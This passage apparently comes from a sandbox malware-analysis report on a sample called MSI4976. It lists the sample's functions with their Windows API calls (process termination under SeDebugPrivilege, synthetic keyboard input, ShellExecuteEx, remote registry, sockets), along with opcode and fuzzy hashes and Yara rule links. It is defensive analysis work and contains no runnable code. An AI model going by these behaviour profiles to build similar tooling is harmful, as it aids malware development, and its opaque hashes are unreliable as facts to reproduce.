                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                                        • String ID: hE=
                                        • API String ID: 1380811348-1826862299
                                        • Opcode ID: e82ddd75883f608c9e935a505e3873cca2eb33b5da2322748e5d9dd5d1f4f242
                                        • Instruction ID: bbf12ce9c613668bfcaffa7e2e7f92c4a4683a332db100fcebd04ebda268e1a7
                                        • Opcode Fuzzy Hash: e82ddd75883f608c9e935a505e3873cca2eb33b5da2322748e5d9dd5d1f4f242
                                        • Instruction Fuzzy Hash: 185190715043109FD322EF24D885EABB7ECEF89754F00491EF5869B251EB70EA05CB92
                                        Function 00381620 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00366F5B: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00366F7D
                                          • Part of subcall function 00366F5B: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00366F8D
                                          • Part of subcall function 00366F5B: CloseHandle.KERNEL32(00000000,?,00000000), ref: 00367022
                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0038168B
                                        • GetLastError.KERNEL32 ref: 0038169E
                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 003816CA
                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 00381746
                                        • GetLastError.KERNEL32(00000000), ref: 00381751
                                        • CloseHandle.KERNEL32(00000000), ref: 00381786
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                        • String ID: SeDebugPrivilege
                                        • API String ID: 2533919879-2896544425
                                        • Opcode ID: f332aeec0eb93c3997719c6296dcc45c640a9dacdc8d1fc42b0a2477ffa1b6c2
                                        • Instruction ID: 4f965f37b13f02b5904f9174a8a68957c4425e4b9b7417e20181bb208635c40c
                                        • Opcode Fuzzy Hash: f332aeec0eb93c3997719c6296dcc45c640a9dacdc8d1fc42b0a2477ffa1b6c2
                                        • Instruction Fuzzy Hash: F141CF72700201AFDB06EF54C8E2FADB7A9AF59304F098049F9069F2D2EBB5D905CB51
                                        Function 0038E1A7 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 108windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • ShowWindow.USER32(003E1810,00000000,?,?,003E1810,003E1810,?,0039E2D6), ref: 0038E21B
                                        • EnableWindow.USER32(?,00000000), ref: 0038E23F
                                        • ShowWindow.USER32(003E1810,00000000,?,?,003E1810,003E1810,?,0039E2D6), ref: 0038E29F
                                        • ShowWindow.USER32(?,00000004,?,?,003E1810,003E1810,?,0039E2D6), ref: 0038E2B1
                                        • EnableWindow.USER32(?,00000001), ref: 0038E2D5
                                        • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0038E2F8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Window$Show$Enable$MessageSend
                                        • String ID: @U=u
                                        • API String ID: 642888154-2594219639
                                        • Opcode ID: 4d3516e719e28b4634661544aceddc897a5b594aeada60eca2203d8604f49c1d
                                        • Instruction ID: 96ac288d8d2e5aae6a8bea4c86295c7d2a66cfdc0ccac11a614602a649747e9f
                                        • Opcode Fuzzy Hash: 4d3516e719e28b4634661544aceddc897a5b594aeada60eca2203d8604f49c1d
                                        • Instruction Fuzzy Hash: 3B419E35200244EFDB27FF68C499B947BE9BF0A304F1945F9EA598F6A2C731A841CB51
                                        Function 00366237 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadIconW.USER32(00000000,00007F03), ref: 003662D6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: IconLoad
                                        • String ID: blank$info$question$stop$warning
                                        • API String ID: 2457776203-404129466
                                        • Opcode ID: 286ecaf2ad7912d350699e45b0e3f78f58b37f8b93b439b881e0061dd6199c9c
                                        • Instruction ID: 6ef02dcf68f32903e133f45f1b90d7c8f0230f5755b2aca1fd1b8b6043266783
                                        • Opcode Fuzzy Hash: 286ecaf2ad7912d350699e45b0e3f78f58b37f8b93b439b881e0061dd6199c9c
                                        • Instruction Fuzzy Hash: 88110D32248742BAD7075B549CA3DAA77DCDF173A4B10442EF5016A6C6F7B0BE404265
                                        Function 0036757B Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 46windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000100,00000000), ref: 00367595
                                        • LoadStringW.USER32(00000000), ref: 0036759C
                                        • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 003675B2
                                        • LoadStringW.USER32(00000000), ref: 003675B9
                                        • _wprintf.LIBCMT ref: 003675DF
                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 003675FD
                                        Strings
                                        • %s (%d) : ==> %s: %s %s, xrefs: 003675DA
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: HandleLoadModuleString$Message_wprintf
                                        • String ID: %s (%d) : ==> %s: %s %s
                                        • API String ID: 3648134473-3128320259
                                        • Opcode ID: 8b8818723ca49d807503d4eac10781717768eb48078a9ec23e4f6b13ae6d546f
                                        • Instruction ID: acb7f04c617e38b511acecb6c11f0fb1acfdd1b56f60b03d2f6015c34b55663f
                                        • Opcode Fuzzy Hash: 8b8818723ca49d807503d4eac10781717768eb48078a9ec23e4f6b13ae6d546f
                                        • Instruction Fuzzy Hash: 720186F6900208BFE712A7E4DD89EE7376CD705304F404491B746E6451EA749E848B35
                                        Function 00382A0A Relevance: 12.3, APIs: 8, Instructions: 251registryCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0032CAEE: _memmove.LIBCMT ref: 0032CB2F
                                          • Part of subcall function 00383AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00382AA6,?,?), ref: 00383B0E
                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00382AE7
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: BuffCharConnectRegistryUpper_memmove
                                        • String ID:
                                        • API String ID: 3479070676-0
                                        • Opcode ID: 5fd9bb8c6ddf5f9a06ffb3185048b45d58604e6e227d62251d34753872d204b5
                                        • Instruction ID: 8a1e5bf904eae3ffc4e91a9dce7e41f5ecbecf1d09fdfc578969dcb4a18c87eb
                                        • Opcode Fuzzy Hash: 5fd9bb8c6ddf5f9a06ffb3185048b45d58604e6e227d62251d34753872d204b5
                                        • Instruction Fuzzy Hash: 80915875604301AFCB06EF54C891B6EBBE9FF88310F14885DF9969B2A1DB34E945CB42
                                        Function 00379A66 Relevance: 12.2, APIs: 8, Instructions: 247networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • select.WS2_32 ref: 00379B38
                                        • WSAGetLastError.WS2_32(00000000), ref: 00379B45
                                        • __WSAFDIsSet.WS2_32(00000000,?), ref: 00379B6F
                                        • WSAGetLastError.WS2_32(00000000), ref: 00379B9F
                                        • htons.WS2_32(?), ref: 00379C51
                                        • inet_ntoa.WS2_32(?), ref: 00379C0C
                                          • Part of subcall function 0035E0F5: _strlen.LIBCMT ref: 0035E0FF
                                          • Part of subcall function 0035E0F5: _memmove.LIBCMT ref: 0035E121
                                        • _strlen.LIBCMT ref: 00379CA7
                                        • _memmove.LIBCMT ref: 00379D10
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: ErrorLast_memmove_strlen$htonsinet_ntoaselect
                                        • String ID:
                                        • API String ID: 3637404534-0
                                        • Opcode ID: ca4a9ad32d6b862013fb8a94af7026e683cdde95e2b3a81a603c379e10813b08
                                        • Instruction ID: 4020c542a2586e3a9a76e5da1e6a689d95ccd1b08aa214969cb1f2ccf6574be9
                                        • Opcode Fuzzy Hash: ca4a9ad32d6b862013fb8a94af7026e683cdde95e2b3a81a603c379e10813b08
                                        • Instruction Fuzzy Hash: DB81BD31504210AFC726EF24DC85F6BB7E8EB89710F10861EF55A9B2A1DB34ED04CB92
                                        Function 0034B72C Relevance: 12.1, APIs: 8, Instructions: 118COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • __mtinitlocknum.LIBCMT ref: 0034B744
                                          • Part of subcall function 00348A0C: __FF_MSGBANNER.LIBCMT ref: 00348A21
                                          • Part of subcall function 00348A0C: __NMSG_WRITE.LIBCMT ref: 00348A28
                                          • Part of subcall function 00348A0C: __malloc_crt.LIBCMT ref: 00348A48
                                        • __lock.LIBCMT ref: 0034B757
                                        • __lock.LIBCMT ref: 0034B7A3
                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,003D6948,00000018,00356C2B,?,00000000,00000109), ref: 0034B7BF
                                        • RtlEnterCriticalSection.NTDLL(8000000C), ref: 0034B7DC
                                        • RtlLeaveCriticalSection.NTDLL(8000000C), ref: 0034B7EC
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                                        • String ID:
                                        • API String ID: 1422805418-0
                                        • Opcode ID: 79143dec2848fdf75f8bd77d4fdf6712af45fc542032439c140154036b42d55e
                                        • Instruction ID: 13a54d89a90a2744acde3c9d77fd6fc04254f3d7cc4018e3306b2c1056b4bd7a
                                        • Opcode Fuzzy Hash: 79143dec2848fdf75f8bd77d4fdf6712af45fc542032439c140154036b42d55e
                                        • Instruction Fuzzy Hash: 894113719002558BEB169FA8D8843ACFBE8AF41325F158318E425AF6E2C7B4F841CB90
                                        Function 0036A1B7 Relevance: 12.1, APIs: 8, Instructions: 100fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • InterlockedExchange.KERNEL32(?,000001F5), ref: 0036A1CE
                                          • Part of subcall function 0034010A: std::exception::exception.LIBCMT ref: 0034013E
                                          • Part of subcall function 0034010A: __CxxThrowException@8.LIBCMT ref: 00340153
                                        • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 0036A205
                                        • RtlEnterCriticalSection.NTDLL(?), ref: 0036A221
                                        • _memmove.LIBCMT ref: 0036A26F
                                        • _memmove.LIBCMT ref: 0036A28C
                                        • RtlLeaveCriticalSection.NTDLL(?), ref: 0036A29B
                                        • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 0036A2B0
                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 0036A2CF
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                        • String ID:
                                        • API String ID: 256516436-0
                                        • Opcode ID: fc1ea094a3bd15392dcf291f3c14a79e87c2bba6e445b68234718d5969abe404
                                        • Instruction ID: 0cafc98e0b40e1d71c51f6112b1ce15520686b5cc70f6e0ba7ae5e3c910cdd5e
                                        • Opcode Fuzzy Hash: fc1ea094a3bd15392dcf291f3c14a79e87c2bba6e445b68234718d5969abe404
                                        • Instruction Fuzzy Hash: 48319E31A00105ABCF02DFA4DC85AAEBBB8EF45310F1480A5E905AF256D774DA14CBA1
                                        Function 00371BFA Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 308COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 003284A6: __swprintf.LIBCMT ref: 003284E5
                                          • Part of subcall function 003284A6: __itow.LIBCMT ref: 00328519
                                          • Part of subcall function 00323BCF: _wcscpy.LIBCMT ref: 00323BF2
                                        • _wcstok.LIBCMT ref: 00371D6E
                                        • _wcscpy.LIBCMT ref: 00371DFD
                                        • _memset.LIBCMT ref: 00371E30
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                        • String ID: X$t:=p:=
                                        • API String ID: 774024439-2285903649
                                        • Opcode ID: cd697cc9ea10e78d32afc26649073bfe53adc96877d64fc2db94b85ee238b691
                                        • Instruction ID: 8f4dee9fbde810ae4a683029a0e9f414371ff0061aff1dfc0a25d474238001ab
                                        • Opcode Fuzzy Hash: cd697cc9ea10e78d32afc26649073bfe53adc96877d64fc2db94b85ee238b691
                                        • Instruction Fuzzy Hash: C2C173355087109FC726EF28D891A9EB7E4BF85310F01892DF8999B2A1DB74ED45CB82
                                        Function 0033B40F Relevance: 10.7, APIs: 7, Instructions: 218COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c0078fa16067e0e94db2d12278e09735869948a9d8b29e78ab2ec182618823c2
                                        • Instruction ID: 4564aad78ad2a7815bd8cccd7142cbb258e7ce7600bdae83512e55485042fc97
                                        • Opcode Fuzzy Hash: c0078fa16067e0e94db2d12278e09735869948a9d8b29e78ab2ec182618823c2
                                        • Instruction Fuzzy Hash: 5E716D71904109EFDF06CF99CC88ABEBB78FF86314F248159FA15AA251C7349A51CFA4
                                        Function 00382121 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 191COMMON
                                        Download Yara Rule
                                        APIs
                                        • _memset.LIBCMT ref: 0038214B
                                        • _memset.LIBCMT ref: 00382214
                                        • ShellExecuteExW.SHELL32(?), ref: 00382259
                                          • Part of subcall function 003284A6: __swprintf.LIBCMT ref: 003284E5
                                          • Part of subcall function 003284A6: __itow.LIBCMT ref: 00328519
                                          • Part of subcall function 00323BCF: _wcscpy.LIBCMT ref: 00323BF2
                                        • CloseHandle.KERNEL32(00000000), ref: 00382320
                                        • FreeLibrary.KERNEL32(00000000), ref: 0038232F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                                        • String ID: @
                                        • API String ID: 4082843840-2766056989
                                        • Opcode ID: c68599e17f40168fb3a2221d4a242ade5a8d83588661f1a6e9fb9d27e64a094c
                                        • Instruction ID: 8fbfedac1f67a389f6605725bc805945c89cc40bc34bac0afd318708867f4a59
                                        • Opcode Fuzzy Hash: c68599e17f40168fb3a2221d4a242ade5a8d83588661f1a6e9fb9d27e64a094c
                                        • Instruction Fuzzy Hash: 5D71AA75A00629DFCB06EFA4D8959AEB7F5FF48310F108499E856AB351DB30AE40CB90
                                        Function 003647DE Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetParent.USER32(?), ref: 0036481D
                                        • GetKeyboardState.USER32(?), ref: 00364832
                                        • SetKeyboardState.USER32(?), ref: 00364893
                                        • PostMessageW.USER32(?,00000101,00000010,?), ref: 003648C1
                                        • PostMessageW.USER32(?,00000101,00000011,?), ref: 003648E0
                                        • PostMessageW.USER32(?,00000101,00000012,?), ref: 00364926
                                        • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00364949
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: MessagePost$KeyboardState$Parent
                                        • String ID:
                                        • API String ID: 87235514-0
                                        • Opcode ID: 86236d156456b76ebe6a9e268e8df2f78484554c5e54476e8bdb12171fc2bf6b
                                        • Instruction ID: 7671fede95c6fbd48f770f3a7e57570e756f0ff595e94eef91ad7b8e7bc62f3d
                                        • Opcode Fuzzy Hash: 86236d156456b76ebe6a9e268e8df2f78484554c5e54476e8bdb12171fc2bf6b
                                        • Instruction Fuzzy Hash: 5251CDA0E487D53DFB3B4634C845BBBBEE96B06304F09C589E1D54A8C6C7D9E888D760
                                        Function 003645F9 Relevance: 10.7, APIs: 7, Instructions: 164windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetParent.USER32(00000000), ref: 00364638
                                        • GetKeyboardState.USER32(?), ref: 0036464D
                                        • SetKeyboardState.USER32(?), ref: 003646AE
                                        • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 003646DA
                                        • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 003646F7
                                        • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 0036473B
                                        • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 0036475C
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: MessagePost$KeyboardState$Parent
                                        • String ID:
                                        • API String ID: 87235514-0
                                        • Opcode ID: 2ad4c18972969327a2fd97f089918216ddc4b21aa9413fd079bd4a589e636490
                                        • Instruction ID: 9dd09acf6df33793a90618184548a7e1eb61ac0bf686f78b874020958ea401d2
                                        • Opcode Fuzzy Hash: 2ad4c18972969327a2fd97f089918216ddc4b21aa9413fd079bd4a589e636490
